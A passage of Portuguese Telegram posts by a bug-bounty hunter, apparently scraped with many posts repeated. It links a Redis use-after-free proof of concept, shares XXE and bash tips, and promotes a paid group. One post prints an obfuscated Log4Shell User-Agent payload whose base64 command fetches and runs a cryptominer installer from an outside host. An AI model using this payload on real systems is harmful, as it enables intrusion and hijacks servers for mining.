CVE-2025-49844 (RediShell) - Proof of Concept
Use-After-Free vulnerability in Redis Lua interpreter
https://github.com/raminfp/redis_exploit
Eu dei uma conferida no source, parece autentico e sem fins maliciosos, mas sempre verifiquem e assuma o risco por sua conta
Use-After-Free vulnerability in Redis Lua interpreter
https://github.com/raminfp/redis_exploit
Eu dei uma conferida no source, parece autentico e sem fins maliciosos, mas sempre verifiquem e assuma o risco por sua conta
Alguém on aí pra eu pedir um favor de teste no site (acessar e ficar navegando)?
https://brunomenozzi.com/
https://brunomenozzi.com/
Isso independe do que tu ta executando na tua VPS. No meu caso o blog foi feito com hugo + o tema geekdocs.
Como vocês são hackers, eu vou de site estático mesmo hahaha
Payload:
User Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')Galera, coloquem em suas agendas os dias e horários pra assistir essa galera de peso! Seguem mais infos:
É com imensa felicidade que anunciamos a OFFSEC FEST, realizada pela LICS | Liga de Cibersegurança da UNICAMP.
Trata-se de um evento online e gratuito, disponível para toda a comunidade de segurança da informação brasileira, na qual reforça a principal tarefa das universidades públicas: a democratização do acesso ao conhecimento.
Palestras:
05/11 - 19h: Francisco Marinho (IT.eam) | Além do SIEM, Técnicas modernas de evasão em ambientes monitorados
11/11 - 12h: Vinicius Vieira (Trustly) | OPSEC for Red Teamers, Como ficar fora da cadeia
19/11 - 19h: Rafael Félix (Hakai) | Utilização de LLMs para facilitar a análise de Malwares
26/11 - 12h: Daniel Marques (EY) | Amplificando ataques de phishing com I.A generativa
Link de inscrição: https://forms.gle/SSkYtabVhhHMDwHCA
É com imensa felicidade que anunciamos a OFFSEC FEST, realizada pela LICS | Liga de Cibersegurança da UNICAMP.
Trata-se de um evento online e gratuito, disponível para toda a comunidade de segurança da informação brasileira, na qual reforça a principal tarefa das universidades públicas: a democratização do acesso ao conhecimento.
Palestras:
05/11 - 19h: Francisco Marinho (IT.eam) | Além do SIEM, Técnicas modernas de evasão em ambientes monitorados
11/11 - 12h: Vinicius Vieira (Trustly) | OPSEC for Red Teamers, Como ficar fora da cadeia
19/11 - 19h: Rafael Félix (Hakai) | Utilização de LLMs para facilitar a análise de Malwares
26/11 - 12h: Daniel Marques (EY) | Amplificando ataques de phishing com I.A generativa
Link de inscrição: https://forms.gle/SSkYtabVhhHMDwHCA
ei, já almoçou?!
Agora clica no link para ler o conteúdo que eu tinha te falado ontem!
"Como sair dos duplicados em Bugbounty?"
https://brunomenozzi.com/VIP/como_sair_de_duplicados_part1/
Essa é a parte 1 da nossa saga! Espero que gere alguns insights pra ti.
Agora clica no link para ler o conteúdo que eu tinha te falado ontem!
"Como sair dos duplicados em Bugbounty?"
https://brunomenozzi.com/VIP/como_sair_de_duplicados_part1/
Essa é a parte 1 da nossa saga! Espero que gere alguns insights pra ti.
Entre hoje e amanhã vou postar no nosso site uma prévia textual com o assunto:
"Como sair dos duplicados em Bugbounty?"
O texto na página é uma forma de não deixar vocês de fora da saga que nosso grupo VIP está tendo (Imagem que enviei agora)!
Se tu quiser uma explicação mais detalhada desse assunto e outros, cola com a gente no grupo VIP. Mais informações no link a seguir:
https://t.me/zeroc00i_news/475
Tem muitos cenários além dos payloads básicos do XXE
To construindo essa página aqui para falar um pouco mais disso.
Alguns highlights:
- Já encontrei em bugbounty um XXE no parâmetro SAMLResponse de uma aplicação, que por padrão já espera um formato XML.
- Parece simples, mas muitas vezes explorar um XXE sabendo a sintaxe certa de uma requisição SOAP, pode te dar uma dor de cabeça.
Leia mais em: https://brunomenozzi.com/posts/XXE/introducao/
ALERTA DE SEGURANÇA
... a maioria é falso positivo, mas essa call aqui é boa pra ti!
Galera, de tarde fiz a abertura do grupo premium que eu havia falado uns dias atrás
Resolvi, agora com mais tempo, fazer um vídeo para vocês explicando sobre essa iniciativa de abertura de um grupo premium e o que te espera!
O link para a página é esse 💪:
➡ https://lastlink.com/p/C68E8B1EA/
... a maioria é falso positivo, mas essa call aqui é boa pra ti!
Galera, de tarde fiz a abertura do grupo premium que eu havia falado uns dias atrás
Resolvi, agora com mais tempo, fazer um vídeo para vocês explicando sobre essa iniciativa de abertura de um grupo premium e o que te espera!
O link para a página é esse 💪:
➡ https://lastlink.com/p/C68E8B1EA/
🔥 Pessoal, inscrições pro Grupo premium abertas! 🔥
Acesse o link a seguir e garante tua vaga já!
➡ https://lastlink.com/p/C68E8B1EA/
Ainda hoje vou falar com vocês por lá.
Nos vemos em breve =)
SIMBORAAA
By Zeroc00i
Acesse o link a seguir e garante tua vaga já!
➡ https://lastlink.com/p/C68E8B1EA/
Ainda hoje vou falar com vocês por lá.
Nos vemos em breve =)
SIMBORAAA
By Zeroc00i
Seguindo o nosso mantra: Não basta 'soltar' o conhecimento. Para que seu handle perdure, crie o material que a galera vai consultar por anos
Levei essa dica para o nosso blog explicando sobre o motivo dessa diferença de performance e os file descriptors do linux:
https://brunomenozzi.com/posts/bash-tricks/erros-para-o-dev-null/
Levei essa dica para o nosso blog explicando sobre o motivo dessa diferença de performance e os file descriptors do linux:
https://brunomenozzi.com/posts/bash-tricks/erros-para-o-dev-null/
dica de bash da madrugada
nao usem 2>/dev/null, usem 2>&-
Não faz sentido jogar o erro para o null do sistema, se voce pode simplesmente fechar o canal de erro e evitar o sistema consumir i/o (Essa aprendi com o Júlio Neves)
nao usem 2>/dev/null, usem 2>&-
Não faz sentido jogar o erro para o null do sistema, se voce pode simplesmente fechar o canal de erro e evitar o sistema consumir i/o (Essa aprendi com o Júlio Neves)
M1:tmp brunomenozzi$ time for i in {1..1000000}; do true 2>/dev/null; done #para dev/null
real 0m12.066s
user 0m3.581s
sys 0m8.448s
M1:tmp brunomenozzi$ time for i in {1..1000000}; do true 2>&-; done #fechamos o canal de erro
real 0m2.903s
user 0m2.277s
sys 0m0.619sArtigo muito bom e com referencias boas, tipo a empresa Wiz, do Nagli, pra quem conhece.
Eu ja achei alguns spring em bugbounty um tempo atras e a empresa realmente pagou (achei 4 e nem tinha dado sensivel).
Hoje em dia não foco mais nesse tipo de automação, mas se tu é da metodologia de automação, tem caldo aí
Eu ja achei alguns spring em bugbounty um tempo atras e a empresa realmente pagou (achei 4 e nem tinha dado sensivel).
Hoje em dia não foco mais nesse tipo de automação, mas se tu é da metodologia de automação, tem caldo aí
Acabei de ver que hoje ele lançou o artigo que disse que lançaria.
Enquanto espero a comida chegar vou ler junto com vocês, deixando o link aqui
https://www.dsecured.com/en/articles/spring-boot-actuator-using-misconfig-to-your-advantage-paths-bypasses-techniques
Seguinte! Tô abrindo um Grupo Premium para elevarmos o nível.
Quem me conhece sabe: eu não paro de estudar. A frequência que eu posto aqui não é nada perto dos cenários que eu construo e percorro até acertar. Antes, eu compartilhava mini conteúdos de forma espontânea, sem a estrutura necessária para o aprofundamento. Agora o foco é total em profundidade e organização.
Este será um projeto inicial. A ideia não é lotar o grupo, mas sim manter uma essência dahora, com quem é apaixonado em aprender e transpira infosec assim como eu.
O que te espera nessa imersão?
É o acesso exclusivo e muitas vezes em tempo real à minha rotina como autônomo de infosec. E sobre Bug Bounty, vou ser sincero: nenhum bug hunter vai compartilhar a metodologia exata que utiliza, mas eu vou te expor o pensamento por trás da criação da minha metodologia, para que você possa criar a sua própria. É nisso que acredito. Você também terá acesso as minhas análises e pensamentos aprofundados sobre o universo infosec.
O grupo de hoje continua exatamente como está, de forma gratuita. Já o Premium, com muito mais conteúdos imersivos, para os primeiros inscritos terá um preço super acessível.
Vai ser muito massa ter você nessa jornada.
Fica ligado(a): em breve, solto todos os detalhes de como você garante sua vaga.
Zeroc00i
Quem me conhece sabe: eu não paro de estudar. A frequência que eu posto aqui não é nada perto dos cenários que eu construo e percorro até acertar. Antes, eu compartilhava mini conteúdos de forma espontânea, sem a estrutura necessária para o aprofundamento. Agora o foco é total em profundidade e organização.
Este será um projeto inicial. A ideia não é lotar o grupo, mas sim manter uma essência dahora, com quem é apaixonado em aprender e transpira infosec assim como eu.
O que te espera nessa imersão?
É o acesso exclusivo e muitas vezes em tempo real à minha rotina como autônomo de infosec. E sobre Bug Bounty, vou ser sincero: nenhum bug hunter vai compartilhar a metodologia exata que utiliza, mas eu vou te expor o pensamento por trás da criação da minha metodologia, para que você possa criar a sua própria. É nisso que acredito. Você também terá acesso as minhas análises e pensamentos aprofundados sobre o universo infosec.
O grupo de hoje continua exatamente como está, de forma gratuita. Já o Premium, com muito mais conteúdos imersivos, para os primeiros inscritos terá um preço super acessível.
Vai ser muito massa ter você nessa jornada.
Fica ligado(a): em breve, solto todos os detalhes de como você garante sua vaga.
Zeroc00i
https://anchisesbr.blogspot.com/search/label/H2HC
Pra quem não conhece, o Anchises é oldschool na cena e ele posta nesse blog há muito tempo.
Ah, mas oldschool tipo como?
Segue o print do blog no web.archive em 2007. Mt dahora hauhaa.
TMJ
Ah dai tu me pergunta: po mas o que esse igual ai vai fazer de diferença?
?key=:
Isso universalmente é interpretado como uma chave com um valor de string vazio
?key:
Isso é frequentemente interpretado como chave com um valor nulo, particularmente por frameworks tipo ASP.NET e Ruby on Rails. Outras tecnologias tipo PHP e Node.js podem tratar isso como uma string vazia.
Portanto, diversos comportamentos podem acontecer ou deixar de acontecer simplesmente por essa mudança.
?key=:
Isso universalmente é interpretado como uma chave com um valor de string vazio
?key:
Isso é frequentemente interpretado como chave com um valor nulo, particularmente por frameworks tipo ASP.NET e Ruby on Rails. Outras tecnologias tipo PHP e Node.js podem tratar isso como uma string vazia.
Portanto, diversos comportamentos podem acontecer ou deixar de acontecer simplesmente por essa mudança.